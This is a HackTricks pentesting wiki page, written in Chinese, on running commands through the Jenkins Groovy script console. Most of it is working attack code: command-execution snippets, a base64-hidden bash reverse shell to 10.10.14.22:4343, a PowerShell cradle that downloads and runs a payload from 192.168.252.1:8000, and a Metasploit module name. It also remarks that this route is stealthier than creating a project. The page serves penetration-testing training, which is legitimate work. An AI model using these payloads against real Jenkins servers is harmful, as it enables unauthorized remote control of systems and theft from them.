Jenkins RCE with Groovy Script

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

Jenkins RCE with Groovy Script

这比在 Jenkins 中创建新项目要安静得多

转到 path_jenkins/script
在文本框中输入脚本

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

您可以使用以下命令执行： cmd.exe /c dir

在 linux 中，您可以这样做： "ls /".execute().text

如果您需要在文本中使用引号和 单引号，可以使用 """PAYLOAD"""（三重双引号）来执行有效载荷。

另一个有用的 groovy 脚本 是（替换 [INSERT COMMAND]）：

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

在Linux中的反向Shell

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Windows中的反向Shell

您可以准备一个带有PS反向Shell的HTTP服务器，并使用Jeking下载并执行它：

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

您可以使用此脚本来自动化此过程。

您可以使用MSF获取反向shell：

msf> use exploit/multi/http/jenkins_script_console

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousBasic Jenkins Information NextJenkins RCE Creating/Modifying Project

Last updated 3 days ago